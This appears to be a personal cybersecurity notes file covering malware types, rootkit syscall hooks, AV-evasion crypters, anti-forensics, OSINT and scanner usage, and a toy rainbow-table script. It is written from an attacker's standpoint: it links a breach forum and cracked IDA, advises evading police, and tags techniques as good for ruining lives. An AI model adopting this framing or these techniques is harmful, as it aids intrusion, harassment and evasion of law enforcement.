cybersec
#define cybersec: \
I----------------------------------------------------------------------------------------\
I----------------------------------------------------------------------------------------\
I----------------------------------------------------------------------------------------\
I \
I \
I /$$$$$$ /$$ /$$$$$$ \
I /$$__ $$ | $$ /$$__ $$ \
I | $$ \__/ /$$ /$$| $$$$$$$ /$$$$$$ /$$$$$$ | $$ \__/ /$$$$$$ /$$$$$$$ \
I | $$ | $$ | $$| $$__ $$ /$$__ $$ /$$__ $$| $$$$$$ /$$__ $$ /$$_____/ \
I | $$ | $$ | $$| $$ \ $$| $$$$$$$$| $$ \__/ \____ $$| $$$$$$$$| $$ \
I | $$ $$| $$ | $$| $$ | $$| $$_____/| $$ /$$ \ $$| $$_____/| $$ \
I | $$$$$$/| $$$$$$$| $$$$$$$/| $$$$$$$| $$ | $$$$$$/| $$$$$$$| $$$$$$$ \
I \______/ \____ $$|_______/ \_______/|__/ \______/ \_______/ \_______/ \
I /$$ | $$ \
I | $$$$$$/ \
I \______/ \
I----------------------------------------------------------------------------------------\
I----------------------------------------------------------------------------------------\
I----------------------------------------------------------------------------------------I
https://cheatengine.org
https://breachforums.vc/
# out dated, but theoretically useful resource
http://phrack.org
# cracked IDA (latest version: 7.7)
https://hex-rays.com/ida-pro/
# good resource
https://samsclass.info/
• a common conspiracy theory is that web browsers are intentionally horribly complex
and poorly documented outside of the surface layer in an attempt to obfuscate
backdoors
Time_line:
• obviously this is very much partial
.```````. |`-._/\_.-`|
|''. .''| | || |
\-<> <>-/ ┌───┐ |___o[]o___|
| | │ │ |__[[<>]]__|
\ \_A_/ / └─┬─┘ \ o\/o /
\ = / │ \ || /
\_I_/ │ \ || /
│ '.||.' jgs
│ ``
━┿━ 1972
+----------------------+ │
| The First Documented |───┼
| Overflow Attack | │
+----------------------+ │
━┿━ 1988
+----------------+ │
| Code Injection |───┼
+----------------+ │
│ │
+--------------+ │
| Smashing the | │
| Stack | │
+--------------+ │
━┿━ 1997
│
│ +----------------+
┼───| Non-executable |────────────┐
│ | Stack | │
│ +----------------+ │
│ │
│ │
│ │
│ │
+----------+ │ │
| Ret2Libc |───┼ │
+----------+ │ │
━┿━ 1998 │
│ +----------------+ │
┼───│ Stack Canaries | │
│ +----------------+ │
+---------------+ │ │
| Heap Overflow |───┼ │
+---------------+ │ │
━┿━ 2000 │
│ +------------------+ │
┼───| Heap Mitigations | │
│ +------------------+ │
+---------------+ │ │
| Format String |───┼ │
+---------------+ │ │
━┿━ 2001 │
│ +--------------+ │
┼───| Format Guard | │
│ +--------------+ │
│ +------+ │
┼───| ASLR | │
│ +------+ │
━┿━ 2002 │
+-----------+ │ │
| Info Leak |───┼ │
+-----------+ │ │
━┿━ 2003 │
│ +-------------+ +--------+
┼───| Point Guard | | NX-bit |
│ +-------------+ +--------+
│ │
│ +-----------------+
│ | Instruction set |
│ | Randomization |
│ +-----------------+
━┿━ 2004
+---------------+ │
| Heap Spraying |───┼
+---------------+ │
│ ━┿━ 2005
│ │ +-----+
│ ┼───| CFI |
│ │ +-----+
│ ━┿━ 2007
│ │ +--------------+
│ ┼───| Shadow Stack |
│ │ +--------------+
+----------------+ │
| Heap Feng Shui | │
+----------------+ │
│
+-----+ │
┌───────────────| ROP |───┼
│ +-----+ │
│ ━┿━ 2008
│ │ +-------------+
│ ┼───| Code Divers |────────────────┐
│ │ +-------------+ │
│ +------------------+ │ │
│ | Non-Control Data |───┼ │
│ | Attacks | │ │
│ +------------------+ │ │
│ ━┿━ 2011 │
│ +-----+ │ │
├───────────────| JOP | │ │
│ +-----+ │ │
│ ━┿━ 2013 │
│ +---------+ │ │
│ | JIT-ROP |───┼ │
│ +---------+ │ │
│ ━┿━ 2014 │
│ │ +------------------------+ │
│ ┼───| Code Pointer Integrity | │
│ │ +------------------------+ │
│ │ │ │
│ │ +-------------------+ │
│ │ | Cryptographic-CFI |───┐ │
│ │ +-------------------+ │ │
│ +------+ │ │ │
├──────────────| SROP | │ │ │
│ +------+ │ │ │
│ ━┿━ 2015 │ │
│ │ +-----+ │ │
│ ┼───| XnR | │ │
│ │ +-----+ │ │
│ │ │ │ │
│ │ +----------+ │ │
│ │ | Isomeron | │ │
│ │ +----------+ │ │
│ +------+ │ │ │
│ | COOP |───┼ │ │
│ +------+ │ │ │
│ ━┿━ 2016 │ │
│ │ +-------------------+ │ │
│ ┼───| Vtable protection | │ │
│ │ +-------------------+ │ │
│ │ +------------------+ │ │
│ │ | Runtime Shuffler |───────────┘
│ │ +------------------+ │
│ +-----+ │ │
│ | DOP |───┼ │
│ +-----+ │ │
│ ━┿━ 2018 │
│ │ +---------+ │
│ │ | ARM PAC |───────────────┘
│ │ +---------+
│ ━┿━ 2019
│ │ +-------+
│ ┼───| PAIRS |
│ │ +-------+
│ +-----+ │
└───────────────| BOP | │
+-----+ │
│
│
_│_
\ /
\ /
'
CVE: CVE:
• "Common Vulnerabilities and Exposures"
• security program which maintains a database of exploits also known as CVEs
— each CVE has an ID:
CVE-<YEAR>-<NUMBER>
• some large vulnerabilities gain more rememberable/creative names;
these are unofficial
○ tags
REJECTED - denied and has no ID
RESERVED - published, but not finalized. WIP
DISPUTED - its validity has changed
Malware: Malware:
• "MALicious softWARE"
{ a trojan virus contains a logic bomb which executes a randsomeware payload}
Worm:
• capable of self propagation
— could use:
• network vulnerabilities
• drives
• automated social engineering attacks {email client infection}
Viruses:
• requires a "host"
• attaches it self to another program
Macro:
• refers to macro programs such as those available in Microsoft
office applications
Resident:
• attaches itself to operating system
• inside the OS, only present in memory
Trojan:
• disguises himself as legit software
• may actually do what it promises
• in the background it executes malicious code without the user's knowledge
Logic_bomb:
• triggers code execution upon specific conditions
• commonly tied to time
Polymorhic:
• changes its own byte code (no, not source code, journo monkeys)
to render signature based detection useless
Rootkits:
• a set of tools which are used to keep and hide the root access of an attacker
LKM_technique:
• most common implementation
• system calls are register-ed to allow kernel mode control of the OS
from user mode (by other tools of the kit)
• hooks are register-ed to regular systemcalls with the intent
of protecting the kit
• listings might be altered or destructive operations
• with kernel mode control a kit can hide so well that its impossible to
identify on a running system (static memory analysis might be required)
+---------------------------------------------------------+
| Common System Call Hooks |
+---------------+-----------------------------------------+
| System Call | Purpose of Hook |
+---------------+-----------------------------------------+
| read, | Logging input |
| readv, | |
| pread, | |
| preadv | |
| write, | Logging output |
| writev, | |
| pwrite, | |
| pwritev | |
| open | Hiding file contents |
| unlink | Preventing file removal |
| chdir | Preventing directory traversal |
| chmod | Preventing file mode modification |
| chown | Preventing ownership change |
| kill | Preventing signal sending |
| ioctl | Manipulating ioctl requests |
| execve | Redirecting file execution |
| rename | Preventing file renaming |
| rmdir | Preventing directory removal |
| stat, | Hiding file status |
| lstat | |
| getdirentries | Hiding files |
| truncate | Preventing file truncating or extending |
| kldload | Preventing module loading |
| kldunload | Preventing module unloading |
+---------------+-----------------------------------------+
— the presence of the module can easily be hidden from usermode:
list_del_init(&__this_module.list);
Kernel_memory_patching:
• less common technique as most OS-es dont expose their memory to user mode
(anymore), the most notable exception is *BSD
• const danger of kernel panic from any process operating on the memory being patched
Antivirus: Antivirus:
• a program whose purpose is to identify and cripple malware
• continuously monitors
• signature based indentification uses executable hashes to
spot malware
• may use various techniques to identify suspicous behaviour
HIDS:
• "Host-based Intrusion Detection System"
• monitors the file system
• every file is hashed
• any tempering will show up, which can be further investigated
• trusts that the kernel is legitimate;
if execve() is redirected for a specific executable and
the redirection target is masked in getdirentries(),
the HIDS is defeated
Payload: Payload:
• the part of an attack which is the primary interest to be executed
Keylogger:
• keystrokes are recorded
• usually synced to a server
• sometimes logs are collected upon the next local access
• used to steal private data {passwords}
Ransomware:
• identifies critical data
• may sync critical data to a server
• may encrypt critical data, rendering it useless to the user
• ransom is automatically demanded for the data's restoration
or for the keeping of its secrecy
Remote_access:
• the attacker can remotely execute arbitrary code
{ participant in DDOS attack }
Crypto_miner:
• user resources are used to mine crypto for a foreign wallet
Adware:
• show adds for revenue
• yes, really
Shell_code:
• minimalistic
• usually written in assembly or C used as high level assembly
• spawns a shell
Botnet:
• large number of computers with remote execution capabilities
• most often accomplished by malware, but technically a particularly
popular, but unintentionally vulnerable application could be used
The_laws: The_laws:
• as general in europe
• "everyone has a right for a good public image, and to protect personal secrets and private data"
• "everyone one has a right to query, modify or delete data kept on them"
• any party handling private data has to notify the user about the purpose,
whether its optional, what 3th parties its being shared with
and for how long it is preserved
• anonymized data is not private data, hence neither is pseudo-anonymized data
— europes priorities are:
• standardization
• eliminating monopolies in communication
• protecting privacy rights and adopting them to IT
• protecting intellectual properties
— GDPR:
• "General Data Protection Regulation"
• no sovereignty
• every company MUST abide the rules
• data protection incidents must be publicized
• workers can be monitored, but without violation to their right to dignity
• to constantly monitor workers doing their job, they must be notified
and or infiltrating their private life
• anything, but private property require paper work to be CCTV-d
— CCTV footage can be preserved for:
3 days in general
30/60 days in special cases
• afterwards the footage must be deleted securely
• older footage cannot be presented as evidence in court
• fully automated systems cannot be used to decide a person's fitness for a purpose,
unless its regarding a contract which the person initiated
• data recorded for science can only be used in the name of science
• data recorded for statistic purposes can only be used for statistic purposes
### Why privacy is important ###
I keep seeing "no one cares about your data", "nothing to hide, nothing to fear"
and "you are schitzophrenic Anon" posts with equally retarded replies.
What can your data be used for?
• intrusive advertisement
• targeting with personalized propaganda
• guessing more private data {passwords}
• in preparation for a house break in
• using it as a bias in decision making {loan/insurance terms}
• political and or religious discrimination
• framing
• identity theft
• swatting and harassment
• target selection for whaling
• personalized scams
• haunting by the past
#
h_safety
#define h_safety ((((((\
####################################\
____ __ ____ ____ ____ _ _ \
/ ___) / _\ ( __)( __)(_ _)( \/ )\
\___ \/ \ ) _) ) _) )( ) / \
(____/\_/\_/(__) (____) (__) (__/ \
#####################################
• you're looking for this link: "icanhazip.com"
THEORY: THEORY:
• not getting pwned is good
• jail time is bad
Local_data:
• anything you type can be used against you in a court of law
— The following types of data is widely deemed illegal
either to posses or distribute:
• instructions on illegal {drug, gun} production
• stolen personal information
• copyrighted material
• child pornography
or literally anything in the UK
• modern encryption is really good
Shredding:
• the process of destroying data
• traditional removing doesnt mean the files are irreversibly destroyed
○ methods
• repeated overwrites
• using a magnet
— a note from an Anonymous /g/ent:
"Stop using shred. It doesn't work.\
Use encryption and lose the key when you want to get rid of something.\
You have no guarantee a modern drive is going to overwrite what you tell it to\
unless you have a lab you trust to evaluate its secure erase function."
Meta_data:
• some filetypes save metadata invisible to your average normie
• this metadata leaked can have unpleasant consequences
• also see AT ../reconosense
○ types:
— EXIF
— file operations time stamps
• filesystem dependent
• carried out by the operating system
Encryption:
gpg
luks
• encrypt sensitive data
• encrypting a partition and deliberately loosing the key
can be used as a form of shreadding
Permissions:
"/Linux/Permissions/"
firejail
• stripping network access from applications which may or may not be
backdoored (as you're either unable or too lazy to make sure) is an excellent idea
Addresses:
• getting rid of computer related ids leading backwards will leave one extremely hard to find
• see mac addresses AT "/Networking/?!"
• ipv6 addresses have a tendency to leak throught proxies
• ipv6 protocols can be disable changing the '0' to a '1' in:
/proc/sys/net/ipv6/conf/all/disable_ipv6
Physical_intervention:
• while foreign objects could raise suspetion a "Do not touch/plug out/turn off"
sign should make people less curious
Antivirus:
signature_detection:
" \
One of the most important tools in the world of cybersecurity is \
a FUD (Fully Undetectable) crypter. Used primarily by hackers, \
a crypter is a software program that encrypts a malicious code in \
order to make it undetectable by antivirus programs. FUD crypter \
takes this concept a step further by ensuring the code is not only \
encrypted but completely invisible to antivirus software. \
\
The primary purpose of a FUD crypter is to bypass antivirus \
detection. When a malware is encrypted by a crypter, it modifies the \
malware’s binary code and adds random junk code to the file. This \
renders the signature-based detection used by antivirus software \
ineffective, as the encrypted malware has a new binary signature \
that is different from the original. In addition, crypters often \
employ packing techniques to further obfuscate the malicious code, \
making it even more difficult for antivirus software to detect. \
\
The process of using a FUD crypter typically involves three steps: \
encryption, obfuscation, and execution. The malware is first \
encrypted to avoid detection by antivirus software bypass windows \
defender video. Then, obfuscation techniques are used to alter the \
code, making it more challenging for antivirus software to recognize \
it. Finally, the malicious code is executed, surreptitiously \
infecting the target system. \
\
It is important to note that while FUD crypters can be used \
by hackers and cybercriminals for malicious purposes, they do \
have legitimate applications as well. For example, cybersecurity \
professionals may use crypters in ethical hacking or penetration \
testing to assess the effectiveness of antivirus software and \
identify potential vulnerabilities. \
\
Nonetheless, the widespread availability of FUD crypters poses \
a significant challenge for the cybersecurity community. As \
antivirus software becomes more advanced and adapts to new threats, \
cybercriminals continually develop new encryption methods and \
obfuscation techniques to keep their malicious code undetected. This \
cat-and-mouse game between cybercriminals and cybersecurity \
professionals underscores the importance of continuous innovation \
in the field of cybersecurity. \
\
In conclusion, a FUD crypter is a powerful tool that cybercriminals \
use to encrypt and obfuscate malicious code, rendering it invisible \
to antivirus software. By employing encryption and obfuscation \
techniques, the crypter allows hackers to infect systems without \
detection. While FUD crypters have legitimate applications in \
ethical hacking and penetration testing, they also pose significant \
challenges for cybersecurity professionals in their ongoing battle \
against malware. \
"
Tales:
○
• irredeemable cp distributor who made thousands of pictures and videos,
sent pictures of himself swirled to taunt police
• police can't definitively identify him,
have the swirled pictures but can't get his original face from it
• investigation stalls
• random anon de-swirls his face using photoshop and sends it to FBI
• he's caught, but only gets like 6 years in jail even tho he would deserve life
○
• big game hacker
• makes image of gfs tits
• sends it to the police to taunt them
• the picture contained location metadata
• it was a new "feature" back in the day
• gets fucked
○
• be uni student
• wish to skip test
• wanna cancel the whole event
• make bomb treat over tor
• cops show up
• building is evacuated
• test nuked
• investigators find that the only person using tor at the uni
while the treat was made was you
• correlation, bitch
• got to jail
○
• man works at company
• he is fired OR he spontaneously goes insane OR has strange ambitions
• the computer system of the company suffers immensely
• man goes to jail
• I'm being wage intentionally, this is a tale old as time;
so well known in fact that all investigations start on home turf;
the point is, dont ever touch the computers of your employer,
and dont ever trust your employees with omnipotence
TOOLS: TOOLS:
Local_data:
Shredding:
smem-secure-delete [options] : overwrites unused RAM repeatedly
• has been in beta since ~1997
— steps of normal operation:
• 1 pass with 0x00
• 5 passes with random data (/dev/urandom)
• 27 passes with special values defined by Peter Gutmann, leading civilian cryptographer
• 5 passes with random data (/dev/urandom)
○ [options]
• option grouping is allowed
— f : fast; drop the random passes
— l : drop the middle 2 steps; specify twice to perform only the 1st step
shred [options] [files] : overwrites [file] repeatedly
— n [size_t] : sets how many times [file] shall be overwritten; the default is 3
— u : dealocate and remove [file] after overwrites
--random-source=[file2] : get random bytes from [file2]
— z : add a final overwrite with 0-s to hide shredding
Metadata:
mogrify -strip [image] : delete image metadata
jhead [options] [file]* : manipulates jpeg metadata
— purejpg : removes all data not directly necessary for rendering it
Permissions:
firejail [options] [program] [args] : runs [program] inside a restricted environment
• --help is documented, but does not work;
Addresses:
Tor
macchanger [options] [interface] : mac address changer
• [interface] is a network interface; get a list via running "ip link"
— r : set fully random address
--mac=[MAC] : set address manually
— p : reset to original
— s : show current address
proxychains [command] : run [command] through a chain of proxies; default is tor
— config:
/etc/proxychains.conf : config file
reconocense
#define reconocense(((((((\
################################################################\
____ ____ ___ __ __ _ __ ___ ____ __ _ ____ ____ \
( _ \( __)/ __)/ \ ( ( \ / \ / __)( __)( ( \/ ___)( __)\
) / ) _)( (__( O )/ /( O )( (__ ) _) / /\___ \ ) _) \
(__\_)(____)\___)\__/ \_)__) \__/ \___)(____)\_)__)(____/(____)\
#################################################################
THEORY: THEORY:
OSINT: OSINT:
https://osintframework.com/
• "Open Source Intelligence"
Public_resources:
whois [domain] : requests whois db information on [domain]
Dorking: Dorking:
http://www.google-dorking.com/2016/02/intitlewebcam-7-inurl8080-intext8080.html
• using a search engine to find tartgets/data of interest which are not obvious to come by and or was not meant to be found
Search_engines:
— the big 4:
Google
Bing
Yandex
Baidu
gigablast.com
mojeek.com
millionshort.com
rightdao.com
infotiger.com
Common_advanced_search_options:
intitle:dogs : page title includes the word "dogs"; ("intitle:[webcamera]" is more interesting tho)
inurl:cats : page url includes the word "cats"; ("inurl:ftp" is more interesting tho)
intext:dogs : page body includes the word "dogs"
site:cats.com : results on cats.com
link:cats.com : results linking to cats.com
cats dogs : results about cats and dogs
~dogs : results about dogs, synonyms of "dogs" or similar words
("cats" | "dogs") : results about cats or dogs
"cats and dogs" : results for exact term "cats and dogs". If no results are found, we'll try to show related results.
cats -dogs : fewer dogs in results
cats +dogs : more dogs in results
cats filetype:pdf : pDFs about cats. Supported file types: pdf, doc(x), xls(x), ppt(x), html, txt
dogs site:example.com : pages about dogs from example.com
cats -site:example.com : pages about cats, excluding example.com
[num1]..[num2] : results containing a number from [num1] to [num2]
* : wildcard char expanding to any number of chars { do* }
Sites_that_are_worth_dorking:
drive.google.com
groups.google.com
ghostbin.com
catbox.moe
rentry.org
pastebin.com
anonfiles.com
Metadata: Metadata:
• some filetypes save metadata invisible to your average normie
• analyzing this metadata can be of value
• most websites allowing image/video upload delete this data before publication
Data_recovery: Data_recovery:
• see AT "/Hacking/Safety/Theory/Shreadding"
• by analyzing raw memory old files can be found
• its best to restore the partition table whenever possible
Binary_files: Binary_files:
• most binary files contain human readable (not transformed) strings
Local_spying:
Syscalls:
• it's trivial to monitor syscalls
• I/O require syscalls
# Terminal 1 - sudo
$ strace -p29334 -s9999 -e write
strace: Process 29334 attached
write(2, "e", 1) = 1
write(2, "x", 1) = 1
write(2, "a", 1) = 1
write(2, "m", 1) = 1
write(2, "p", 1) = 1
write(2, "l", 1) = 1
write(2, "e", 1) = 1
write(2, "\n", 1) = 1
write(2, "\33[?2004l\r", 9) = 9
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=29438, si_uid=1000, si_status=127, si_utime=0, si_stime=0} ---
write(3, "#1701520174\nexample\n", 20) = 20
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=29439, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
write(2, "\33[?2004h", 8) = 8
write(2, "\33[31;1m[127] (none) #:\33[0m ", 27) = 27
Terminal 2 - anon - PID 29334
$ example
-bash: example: command not found
• this is why getpass and such are not memes
Warchalking:
• the act of physically marking wireless network networks
• done by notes, scribbles or graffiti
• derived from wardriving
• marks are left as reminders or hints to other hackers
○ symbols
_-----_
/ \
| |
| |
\ /
""---""
--_ _--
\ /
||
||
/ \
— "" ""-
_-----_
/ \
| \ A / |
| V V |
\ /
""---""
_ _
| |---------| |
"\ /"
\_-----_/
/ . . \
| |\_/| |
| | | |
\ /
""---""
○ notes
• drawn around a warchalking symbol if the information is available
"ssid" "login"
Oo oO
Oo oO
OooO
oOOo
oO Oo
oO Oo
"bandwidth"
TOOLS: TOOLS:
OSINT: OSINT:
python3 sherlock [name] [more names optionally] : finds online accounts of [name] (run in sherlock folder)
--folderoutput [name] || -o [name] : if using multiple usernames, the output of the results will be saved to this folder.
--output [name] || -fo [name] : if using single username, the output of the result will be saved to this file.
--tor || -t : Make requests over Tor; increases runtime; requires Tor to be installed and in system path.
--unique-tor || -u : Make requests over Tor with new Tor circuit after each request; increases runtime;
requires Tor to be installed and in system path.
--print || -found : Do not output sites where the username was not found.
--timeout [time] : Time (in seconds) to wait for response to requests. Default timeout of 60.0s.
A longer timeout will be more likely to get results from slow sites.
On the other hand, this may cause a long delay to gather all results.
theHarvester [options] : searches for IPs, emails, users and hosts based on domain
— d [domain] : target domain
— l <int> : limit the number of search results, default=500
— b [source] : source
[source]:
all
baidu
bing
bingapi
certspotter
crtsh
dnsdumpster
dogpile
duckduckgo
github-code
google
hunter
intelx
linkedin
linkedin_links
netcraft
otx
securityTrails
spyse(disabled for now)
threatcrowd
trello
twitter
vhost
virustotal
yahoo
—
• built in outputting to file doesnt seem to work
• google WILL quickly deny your requests
whatweb [domain] : next generation Web scanner. Identify technologies used by websites.
METADATA: METADATA:
exif [image] : displays all image meta data
• the best exit viewer is whatever hexeditor you have installed
NETWORK: NETWORK:
nmap [options] [address] : network mapping tool
— A : aggressive scanning
— F : fast (scans only 100 ports)
— O : os detection
— v : verbose
— iR : picks random IP addresses to scan
— sn : ping scan
— sS : service scan
— sV : version scan
{ nmap -sS 192.168.0.0/24 }
skipfish [options] -o output-directory [ start-url | @url-file [ start-url2 ... ]] : scans for common website vulnerabilities
— A [user]:[pass] : use specified HTTP authentication credentials
— d <int> : maximum crawl tree depth (16)
— r <int> : max total number of requests to send (100000000)
— o [dir] : write output to specified directory (required)
nikto [options] : scan web server for known vulnerabilities
— h [ip] : host ip
— p [port] : host port
— o [file] : output file
— F [...] : specify output file extension
python3 gxlu.py : gmail address verified
— s [email address] : single email verification
— f [file] : import file
— o [file] : output file
— you own all dotted versions of your address
For example, if your email is johnsmith@gmail.com:
john.smith@gmail.com
jo.hn.sm.ith@gmail.com
j.o.h.n.s.m.i.t.h@gmail.com
Are all yours
amass [operation] : site mapping and asset discovery tool
(XXX: systemctl start docker)
[operations]:
intel [options] : collects OSINT
• general options apply
enum [options] : performs DNS enumeration and network mapping
• general options apply
— active : enables active recon methods
— passive : makes the enum purely passive
— brute : enables brute forcing subdomain enum
viz [options] : generates visualization of enum
track [options] : compares results of enums
db [options] : manages enum databases
General_options:
— addr [IP] : specifies target IP, IP ranges or IPs separated by commas
— d : specifies target domain or domains separated by commas
— o [path] : specifies output file
— log [path] : specifies error output file
Wireshark:
tshark [options] : network sniffing, packet capturing and packet analyzing tool
— f "[ffilter]" : sets what packets should or should not be captured
[prefix]
dst : from
scr : to
{ -f "dst host 192.168.0.1" }
[specifier]
host [ip] : traffic related to [ip]
net [ip_range] : traffic related to [ip_range] { -f "net 192.168.0.0/24" }
port <int> : traffic related to DNS port <int>
ip : ipv4 traffic
pppoes : PPPoE traffic
vlan : VLAN trafic
broadcast : network broadcast message
multicast : ethernet multicast
[statement]
[prefix] [specifier]
[flogic]
not [statement]
[statement] and [statement]
[statement] or [statement]
[ffilter]
([flogic]) [statement] ([flogic] [statement] ([...]))
— Y "[Yfilter]" : sets what packets should or should not be displayed
[Yspecifier]
frame.time
frame.time relative
frame.len
frame.protocols
frame.number
eth.addr
eth.dst
ip.addr
ip.src
ip.dst
ip.len
tcp.srcport
tcp.port
tcp.dstport
udp.port
col.Info
http.response.code
[Ylogic]
• noway im going to write an explanation for this
&&, ||, >, <, ==, !
— w [path] : specifies a file to write raw packet data to
— D : lists available interfaces
— i [interface] : specifies interface to sniff on;
tshark uses the first non loopback it finds
— r [path] : specifies file to read (packets) from
DATA_RECOVERY: DATA_RECOVERY:
testdisk : TUI for restoring delete-d and corrupted disks, partitions and files
photorec : TUI for restoring delete-d files
BINARY_FILES: BINARY_FILES:
strings [options] [file] : outputs all NULL terminated strings from [file]
— n <int> : output only atleast <int> long strings; default 4
— e [encoding] : set encoding
s : 7-bit
S : 8-bit
b : 16-bit; big-endian
l : 16-bit; little-endian
B : 32-bit; big-endian
L : 32-bit; little-endian
exploitaion
#define exploitaion\
################################################################\
____ _ _ ____ __ __ __ ____ __ ____ __ __ __ _ \
( __)( \/ )( _ \( ) / \( )(_ _)/ _\(_ _)( )/ \ ( ( \\
) _) ) ( ) __// (_/\( O ))( )( / \ )( )(( O )/ /\
(____)(_/\_)(__) \____/ \__/(__) (__)\_/\_/(__) (__)\__/ \_)__)\
#################################################################
Legend:
Д : suitable to inflict psychological damage or for ruining someones life
$ : suitable for personal monetary gain
----------
THEORY: THEORY:
BRUTE_FORCE: Д$
• the idea of spamming tries all the way till success
• most commonly talked about regarding cracking passwords,
but include everything with blind poking and hoping for the best
Word_lists:
• a literal list of guesses that shall be tried
• rather than trying every possible combination, it tends to be faster
to only try statistically probable combinations
Personalization:
• if one is attempting to brute force a single target instead of a range of targets,
it can be well worth to personalize the word list used
{ p4ssw0rd -> p4ssw0rd${TARGET_BIRTH_DATE} }
Precomputed_table:
• table of password-hash values used for shortening password cracking times given a known hash,
by issuing lookups
{
37b4e2d82900d5e94b8da524fbeb33c0 football
2ab96390c7dbe3439de74d0c9b0b1767 hunter2
21232f297a57a5a743894a0e4a801fc3 admin
}
• a table is called complete if it maps all possible hashes to inputs
• precomputation takes a long while, only future cracking time is reduced
• terrabytes large tables are not unheard of
Chains:
• technique to reduce table sizes
• fancy way of compression
• an arbitrary "reduction function" is used to map the codomain back to the domain
— computation:
• a set of arbitrary starting values are chosen
• repeated iterations of the hashing function and the reduction function is used to generate chains
• only the first and last values are stored
— look up:
• the reduction function is applied to the input alternating with the hashing function until
a value is reached that is present in the table;
• when such record is found, it tells the attacker that the original input must be present in that chain
• the chain is computed again, looking for the original
• if the password is not found, it means the chain "starts at the wrong place";
otherwise put, while the value is part of the chain, it is located in an index
that is before the starting computational value, ie. the attacker does not have it;
otherwise put, while the value is part of the chain, it is located in an index
that is before the starting computational value, ie. the attacker does not have it
Rainbow_tables:
• when each line contains multiple chains for the same starting value using different reduction functions
• the name references to how the table looks if each column of values gets colored for visualization
{
| chain start | chain end |
| | R1() | R2() | R3() |
aaaaaaaaaaa asassd hkhkk cbm
bbbbbbbbbbb adasda khhkk bcv
ccccccccccc asdaas lhlkj vnm
ddddddddddd sssaad hhhhl vnx
eeeeeeeeeee asdaas hkhkk vnc
fffffffffff ssdada khlkk cbx
}
#!/bin/python3
from string import ascii_lowercase, digits
def main():
global chain_len
table = make_full_table()
print(f"{table} {len(table)}\npassword: {table[admin_passwd_hash]}\n//------")
table = make_rainbow_table(6)
print(table, len(table))
password = rainbow_table_lookup(table, chain_len)
if password != None: print("password:", password)
else: print("lol no")
# Very simple hashing function
# key space: str(*)
# hash space: '00' - '11'
# BOTH TEAMS HAVE ACCESS TO THIS
def myhash(s : str) -> str:
return str((sum(ord(c) for c in s) % 12)).rjust(2, '0')
# --- BLUE Team assets ---
# This is were we wish to be granted authentication
# this corresponds to a webform for example
def take_password():
password = input("password for admin: ")
if myhash(password) == admin_passwd_hash: print("We are so in!")
else: print("It's so closed :(")
# --- RED Team assets ---
# We have the admin's password hash
# we would like to deduce his password
# based on it so we may actually login
admin_passwd_hash = '06'
# Our chain length cap
# here its actually the number of calculation
# iterations we would like to perform on each
# starting password
#
# start #1 #2 #3 #4 #5 #6
# / / / / / / /
# 0 -> 00 -> !! -> 06 -> !' -> 00 -> !! -> 06 -> !' -> 00 -> !! -> 06 -> !'
chain_len = 6
# Our reduction function
# notice how it makes no assumption regarding the hash function
# it could and it would probably make it better,
# however this shows it clearly that we are not
# "reversing" the hash function,
# merely forcing the hash space back into the key space.
# put differently, this is a hash function that has
# the opposite key & hash spaces as the original
# hash function
def R(s : str) -> str:
base = ord('!')
return "".join([chr(base + int(c)) for c in s])
# Purest form of bruteforcing
# all (hash -> password) combos are calculated
# this will leave us with 12 entries
def make_full_table():
table = {}
for i in ascii_lowercase:
if len(table) == 12:
break
table[myhash(i)] = i
print(myhash(i), i)
return table
# RAINBOWTABLE calculation
# this will leave us with only 8 entries,
# that's a 33% space requirement reduction!
# however this calculation actually takes longer,
# due to how poor our hash function and mainly
# reduction function is, we get bunch of loops;
# example: // Our first chain
# 0 -> 00 -> !! -> 06 -> !' -> 00 -> !! -> 06 -> !' -> 00 -> !! -> 06 -> !'
# as hashes "00" and "06" alternate, we are calculating
# the same thing over and over again.
# this could prevented by checking for in-chain repetition
# in the generation logic.
# we also perform redundant calculations when chains merge;
# example: // Chain #2 & #5
# 2 -> 02 -> !# -> 08 -> !) -> 02 -> !# -> 08 -> !) -> 02 -> !# -> 08 -> !)
# 5 -> 05 -> !& -> 11 -> "" -> 08 -> !) -> 02 -> !# -> 08 -> !) -> 02 -> !#
# chain #5 starts great, but then sinks to the level of #2
# to be a bit more visual:
# 5 -> 05 -> !& -> 11 -> "" -> 08 -> !) -> 02 -> !# -> 08 -> !) -> 02 -> !#
# 2 -> 02 -> !# -> 08 -> !) -> 02 -> !# -> 08 -> !) -> 02 -> !# -> 08 -> !)
# this happens because "2" & "!)" happen to has to the same thing;
# which means that in this case its actually the hash functions fault;
# however, if the hash function was something industry standard strong,
# the opposite case would be much much more likely: our reduction
# function causes merges, and it should possibly be updated
# the (hash -> password) combos are actually flipped
# for convince, but doesn't matter since our dictionary
# has (key<T> <-> key<U>) pairs
def make_rainbow_table(chain_len):
table = {}
for i in digits:
step = i
for compressor in range(0, chain_len):
print(step + " -> " + myhash(step) + " -> ", end='')
step = R(myhash(step))
print(step)
table[i] = step
table = {v : k for k, v in table.items()}
return table
# This function lets us utilize our ready table
def rainbow_table_lookup(table, chain_len):
# we store passwords in our table,
# but are looking for a hash,
# so we must run to our reduction function
# to convert between the two
target = R(admin_passwd_hash)
# for as long as we dont get a password
# we already know (read: is in the table)
# we rehash and re-reduce our initial hash
# it very well could happen that we never
# arrive to one. that's called though luck
while target not in table:
target = R(myhash(target))
print(" -> " + target, end='')
print('')
# lady fortune is on our side it seems,
# we got a password we know
# but remember, what we now have has gone
# through many iterations of irreversible
# operations
# all this tells us is that,
# from the original hash,
# it is possible to arrive to
# an end element in our chain
guess = table[target]
# so we rewind and reach for the other end
# of our selected chain: our start
# we start recalculating the chain
# from there
print("start:", table[target], end=' ')
for i in range(0, chain_len): # until the chains end
print(" -> ", myhash(guess), end=' ')
# and we check whether our current gibberish
# happens to match the hash of the admin
if myhash(guess) == admin_passwd_hash:
print(" hit!")
return guess
else: # no? calculate the next element of the chain
print(" -> " + R(myhash(guess)), end='')
guess = R(myhash(guess))
print('')
# oh damn oh no, we failed!
# with the current set up,
# its actually impossible because
# our rainbow table is complete
# take a close look yourself:
# 00 -> !!
# 01 -> !"
# 02 -> !#
# 03 -> !$
# 04 -> !%
# 05 -> !&
# 06 -> !'
# 07 -> !(
# 08 -> !)
# 09 -> !*
# 10 -> "!
# 11 -> ""
# these all are from the calculation output
# we happened to hit every hash value
# however it would be possible for us to miss,
# imagine this other, fictional chain:
